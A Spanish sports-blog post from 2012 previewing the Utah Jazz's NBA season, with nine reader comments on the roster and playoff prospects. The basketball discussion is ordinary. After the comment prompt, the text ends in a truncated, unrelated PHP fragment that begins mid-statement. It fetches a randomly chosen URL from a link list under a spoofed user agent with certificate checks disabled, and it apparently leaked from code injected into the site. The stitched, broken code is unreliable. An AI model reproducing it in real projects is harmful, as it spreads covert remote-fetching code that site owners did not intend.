Utah Jazz: Por un paso más

18 de October de 2012 por Esteban
Los Jazz emocionaron a todos el día que se clasificaron para los Playoffs la pasada temporada. La foto del abrazo interminable entre los denostados Millsap y Jefferson rodeados de papel picado que caía del cielo, festejando la hazaña de meterse en PO contra todo pronóstico, se convirtió en una de las imágenes de la temporada.

Pero la sorpresa fue el año pasado y por ende esta temporada se ha subido la vara. Este año deberían ser como mínimo primera ronda, y ese no es un objetivo fácil en el oeste.

A su favor podemos decir que son ganadores en el mercado. A decir verdad, sus puestos débiles siguen siendo débiles pero han experimentado una leve mejoría respecto a la pasada temporada. Además tienen jóvenes con potencial capaces de mejorar lo realizado el año pasado así que objetivo podría cumplirse.

Después de sufrir la marcha de sus ídolos Sloan y D-Will, se vislumbraba un futuro oscuro en Utah por varios años pero la realidad no ha podido ser más distinta a lo que se esperaba. Entre los jugadores que quedaron (Jefferson, Miles, Millsap, Hayward…), la aparición sorprendentemente grata de Tyrone Corbin como entrenador y el gran trade que hicieron con los Nets, que les permitió hacerse con Derrick Favors y Enes Kanter, una dupla con tantísimo presente pero con mucho más futuro, construyeron un buen equipo que dio guerra y espectáculo durante todo el año. 

Precisamente los dos último jugadores que hemos nombrado anteriormente, Favors y Kanter, representa el mayor dilema para los Jazz en estos momentos. Sus dos jugadores estrella, Millsap y Jefferson, han llegado a las cúspides de sus carreras en la franquicia pero no parecen ser líderes que pueden llevar al equipo a otro nivel. En cambio, detrás de ellos aparecen los dos jóvenes que no sólo son el futuro del equipo sino que también deberían comenzar a ser el presente. Traspasar a Millsap o Jefferson sería un gran paso atrás en lo deportivo, ya que curiosamente no parecen tener un buen mercado: Millsap por su físico no parece un cuatro para un contendiente y Jefferson tiene demasiada mala fama. No hay trade posible a la vista por alguno de los dos a cambio de un base, escolta o alero estrella para permitir el salto de Favors o Kanter a la titularidad. Entonces, así quedaron. Lo mejor del equipo es su dupla de internos titulares y lo segundo mejor es su dupla de internos suplentes. Todo un lujo. Lástima que sólo se juegue con dos en cancha  aunque Corbin, en el último juego de PO, salió con tres de ellos en el quinteto titular.

Ahora el equipo:

Dijimos que sus puntos débiles continuaban existiendo pero que en cierta forma los habían mejorado. Es justo lo que ha pasado con el puesto de base en el que se dio salida a Devin Harris y se ha incorporado a Mo Williams. Mo es un escolta anotador en el puesto de base armador pero viene de una buena temporada en los Clippers cumpliendo de buena manera con el papel de sexto hombre. Como anotador es mejor que Harris aunque como armador es igual de malo. El banco compuesto por Earl Watson y Jamaal Tinsley completan una flojo trío de bases.

En el puesto de escolta armarán lo mejorcito del perímetro. Mr. Fundamentos Hayward, después de una brillante temporada en la que destapó como un jugador de equipo integral y un compañero ejemplar, parte con todas las papeletas para ser el escolta titular tras la salida de CJ Miles y la incorporación de Marvin Williams. Junto a Alec Burks, con pocas posibilidades en su año rookie pero muy bien aprovechadas y que además viene cuajando una gran pretemporada, conforma otra pareja clave en el futuro de la franquicia. Ademas ha llegado el tirador Randy Foye, que nos dejó una segunda parte de temporada regular en los Clippers para enmarcar pero uno playoffs pésimos en todos los sentidos, lo que le costó la salida de LA. Un hombre capaz de lanzar nunca viene mal e incluso puede jugar minutos de base. Raja Bell aparece en el roster pero ni siquiera él quiere jugar en los Jazz.

El puesto de alero será en un principio para un Marvin Williams que no ha terminado de rendir nunca en su carrera pero que con más protagonismo aún hay esperanzas de que explote de alguna manera. Las oportunidades de que eso pase cada vez son más remotas pero en Utah sobraba espacio y decidieron jugársela. En el banco ya no está Josh Howard pero se han quedado Demarre Carroll y Jeremy Evans. Evidentemente  Gordon Hayward también jugará muchos minutos en la que es su posición natural compartiendo minutos con escoltas como Burks o Foye.

Ahora el plato fuerte. Dos hombres de 20-10 en el juego interior no los tiene cualquiera. Al Jefferson encontró la madurez de su carrera justo en el momento en el que más se dudaba de él y Paul Millsap explotó todo su potencial anotador. Ambos guiaron al equipo a playoffs. Líderes absolutos del equipo. Su único “pero” es la edad y su techo. Difícilmente puedan guiar al grupo mas allá de la primera ronda pero son valiosos.

Mientras en el banco tienen dos internos que competirán por los galardones de mejor sexto hombre y jugador más mejorado.

Enes Kanter vuelve al ruedo con un físico nuevo y dispuesto a convertirse en el mejor reboteador de la NBA. Su facilidad para recoger rebotes es similar a la de Rodman. Ha perdido kilos y se le ve más ágil. En cualquier otro equipo podría ser perfectamente el pívot titular y no descarto un trade a mitad de año que mande lejos a Jefferson para darle paso. Candidato al jugador mas mejorado.

Derrick Favors disipó el año pasado todas las dudas que surgieron tras su año rookie. Un físico imponente, una fuerza descomunal y una coordinación que asusta son sus principales argumentos, sin descuidar que hizo unos playoffs tremendos con mas de 11 ppp y mas de 9 rpp, mejores números que en la regular. Si sale desde el banco y mantiene el nivel mostrado en PO será candidato al mejor sexto hombre del año y también al jugador más mejorado.

La cuestión es, ¿seguir con esta temática de jugar hasta primera ronda o darle los minutos a sus jóvenes internos para dar un paso mas allá? El núcleo joven conformado por Burks, Hayward, Favors y Kanter es uno de los mejores núcleos jóvenes de la liga. Si pudieran transformar a Jefferson y Millsap en una estrella que los guíe no tienen techo. ¿Quién podría ser esa estrella? El ideal seria D-Will (jeje…) pero CP3 no vendría nada mal…

Quinteto: Mo Williams, Gordon Hayward, Marvin Williams, Paul Millsap, Al Jefferson
Sexto Hombre: Derrick Favors

Pronóstico: Primera ronda de PO

Comenta

9 comentarios a esta entrada

  1. Denise dice:
    #1

    Primera ronda?? Yo no los veo ni en PO.

    Equipo parecido al de los Hawks, con buena pareja interior pero sin ningun killer por fuera. La diferencia, que los Halcones juegan en el Este y lo tienen facil para entrar en PO.

    Pronóstico: 38-44 . Fuera de playoffs.

      Citar

  2. jose antonio ramirez dice:
    #2

    Hola a todos, he vueto de las vacaciones y ya queda poquito para una de las temporadas mas apasionantes que se recuerdan. No se porque pero siempre que opino de un analisis el primer equipo que me toca son los jazz. Bueno, vayamos al grano. Ya lo dije en años pasados que tienen el mejor juego interior de la liga con diferencia. No añadire mas de lo que ya a comentado Esteban en su gran analisis pero si un par de cosillas. Yo si pienso que en la rotacion exterior se a dado un paso adelante en cuanto a lo que tenian y lo que han pillado. Mo williams es mucho mejor que un Devin Harris que se dejaba llevar en utha estas campañas y la apuesta por Marvin Williams es valiente y con una recompensa que seguro que superara al riesgo que conlleva su fichaje. Este hombre aver si explota de una vez y aunque tal vez nunca sea lo que se esperaba de el al salir de la universidad por lo menos acercarse, y eso ya seria mucho. Randy foye es un gran acierto porque necesitaban tiro exterior como el comer para aprovechar los espacios que crean por dentro, una de las claves del barrido de spurs en play offs el año pasado. Hayword poco a poco va mostrando lo que se esperaba de el y del resto de exteriores no mucho mas, quiza alex burck. Y ahora bien, no estoy de acuerdo que el mejor milsap-jefferson se haya visto todavia o que hayan tocado techo, quiza si milsap que seria el que yo traspasaria para subir el nivel de la plaNtilla pero jefersson en un 20-10 peremne que si jugara en otro mercado seria alls star sin duda. Favors en un jugadorazo en toda regla que deberia explotar el dia que no este milsap, en cuanto a kanter tengo mas dudas y mucho por demostrar todavia. La cuestion en utha es que es un equipo que se mantiene en un espacio que ni le deja recontruir ni subir un nivel mas de lo que hizieron el año pasado. Yo diria que son candidatos hasta el ultimo dia a entrar en postemporada pero a partir de ahi no tienen capacidad para ir mas alla de la primera ronda. Para quitar el atasco este que he comentado deberian meter en un trade a dos jugadores que podrian ser milsap-kanter por si solo el primero no tiene tanto mercado, dejar espacio y minutos a favors y pillar un jugador sobre el que edificar algo mas ambicioso. ¿Quien podria ser esa supuesta estrella? Lo que si que tengo claro que jeferson seria instrasferible. O una operacion asi o darle minutos a los jovenes y reconstruir, porque aunque es loable y esta muy bien llegar todos los años a primera ronda, a veces hay que dar un cambio de rumbo para dar ese impulso que les permita cotas mayores. Equipo interesante sin dudas, mejores que el año pasado como ha dicho esteban pero que no les da para mas. Saludos a todos y gracias.

      Citar

  3. simon dice:
    #3

    Hombre el equipo es el mismo del año pasado y con las posibles bajas al inicio de Nowitzki y Love en sus equipos si consiguen un buen inicio si que podrían estar peleando un puesto en la post-temporada.
    un traspaso del estilo ( Jefferson, Millsap y Williams por Maynor Harden Perk sería cojonudo si pudieran coger una ronda top 5 en el draft del año que viene para apuntalar el equipo por fuera ) pero no creo que cuadren ni los salarios ni el resto de condicionantes…
    ya digo lo mejor sería hacer espacio a Kanter y Favors aun sacrificando las opciones inmediatas pero eso es muy fácil decirlo, cuando un equipo se ve ahi cerca del PO va a luchar por ellos a muerte aunque sepa que su tope es primera ronda. ( a no ser que seas una franquicia estilo Lakers o Celtics en los que solo entrar año si año tambien en PO sin aspiraciones no vale y entonces se tiene que apostar mas fuerte… )

      Citar

  4. Sancho88 dice:
    #4

    No creo que Kanter o Favors sean mejores que Millsap o Jefferson, ni que tengan ese gran techo que pronosticas. Kanter va cortito de fundamentos, y Favors me temo que también. Físico tienen para parar un tren, pero si no son inteligentes, cómo van a liderar un equipo para llevarlo a playoffs? No comparto para nada que les deban dar la titularidad en vez de los otros dos. Eso es lo único salvable del equipo más Hayward. Lo demás apesta bastante, aunque la dirección no está del todo mal, y parece que Tinsley lo hizo medianamente bien el año pasado, puede que este año lo mantenga. Creo que al final Foye le ganará la tostada a Williams, quien para mí es un jugador totalmente irrecuperable. No sé cuál era la especulación acerca de su potencial, pero desde luego es clase media baja de la liga y así será para siempre. Es un jugador limitadísimo, con una IQ bajísima y una defensa de chiste. No obstante, seguro que los Jazz pelean por los PO como siempre, aunque yo este año les dejo fuera. 37-45

      Citar

  5. melo15 dice:
    #5

    Siento no coincidir contigo Sancho pero creo que te equivocas con Favors y Kanter, el primero con 19 años se ha hecho un 11-9 en Playoffs y aportando defensa y rebote. Sobre Kanter creo que no hizo una buena temporada, pero tambien es dificil para un interior salir y aportar, pero hay que saber que Kanter tuvo una tasa de rebotes superior a la de Love aparte de que si que tiene algun que otro movimiento en el poste. Pero a pesar de esto yo no creo que se tenga que traspasar a Jefferson y Milsap, el uno o el otro y Kanter o Favors, traspasar a los dos seria correr demasiads riesgos, pero si que por Milsap y Kanter se puede conseguir un buen interior y un exterior bueno.
    Yo tampoco creo que lleguen a Playoffs: 38-44

      Citar

  6. Txusma dice:
    #6

    Derrick Favors tiene pinta de jugador TOP en cuanto a defensa se refiere y todos sabemos lo importante que es eso en el juego interior. Al tiempo.

      Citar

  7. melo15 dice:
    #7

    Esta claro Txusma, y cual es el punto debil de Jefferson?Aiba que casualidad es la defensa! Yo definitivamente empezaria con Milsap de alero haber si se puedo y si no a la calle con Kanter a por un exterior de calidad, lo que no se puede es tener un juego interior brutal y un perimetro de mierda.

      Citar

  8. Esteban dice:
    #8

    los q dudan de kanter es por que no lo han visto jugar y solo ven sus estadisticas a secas

    les comento que el año pasado en su año rookie promedio 11.5 rebotes por cada 36 minutos

      Citar

  9. Sancho88 dice:
    #9

    Sí, dudo efectivamente porque le he visto jugar. Le faltan tantas cosas a ese chico…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>